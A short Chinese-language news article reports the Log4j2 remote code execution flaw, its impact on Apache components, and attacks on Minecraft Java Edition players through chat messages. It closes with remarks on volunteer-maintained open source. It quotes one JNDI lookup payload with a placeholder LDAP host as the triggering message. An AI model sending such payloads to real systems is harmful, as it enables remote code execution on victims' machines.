漏洞|元宇宙概念游戏“我的世界”遭到由log4j2存在漏洞引起的网络攻击_

12月9日晚，根据360安全卫士服务号披露，开源项目Apache Log4j2存在的一个远程代码执行漏洞，其中细节被公开，很多黑客伺机开始攻击各种商业项目。

文章插图
log4j
由于log4j 是java生态中非常非常基础的一个日志库，可以说是到“水电煤”级别的库。JAVA的很多组件都会依赖、使用这个库进行日志写入。

文章插图
目前 Apache Solr、Apache Struts2、Apache Druid、Apache Flink 等众多组件及大型应用均已经受到了影响，需尽快采取方案阻止。

我的世界JAVA版攻击
【漏洞|元宇宙概念游戏“我的世界”遭到由log4j2存在漏洞引起的网络攻击】特别是我的世界JAVA版本中，攻击方法超级简单，在游戏的在线聊天中，发送一条带漏洞触发指令的消息，类似“${jndi:ldap://{}.http://xxxxxxxxxxxxxx}”,就可以对收到这条消息的用户发起攻击。

文章插图
截止目前，根据360观测到的数据，“我的世界”数十万用户被入侵。因触发简单、攻击难度低、而首当其冲。

老斜说
log4j这个库不是大企业开发的，而且是免费开源，它后续的维护和升级都是一群为爱发电的开发者在那里维护升级的。

文章插图
所以讲真的，这群开发者也没有法律义务去修复好这个漏洞。这事也给普通开发者敲一下警钟，免费开源是很香，但是一定要做好隔离和熔断。不然后果太严重了。

举报/反馈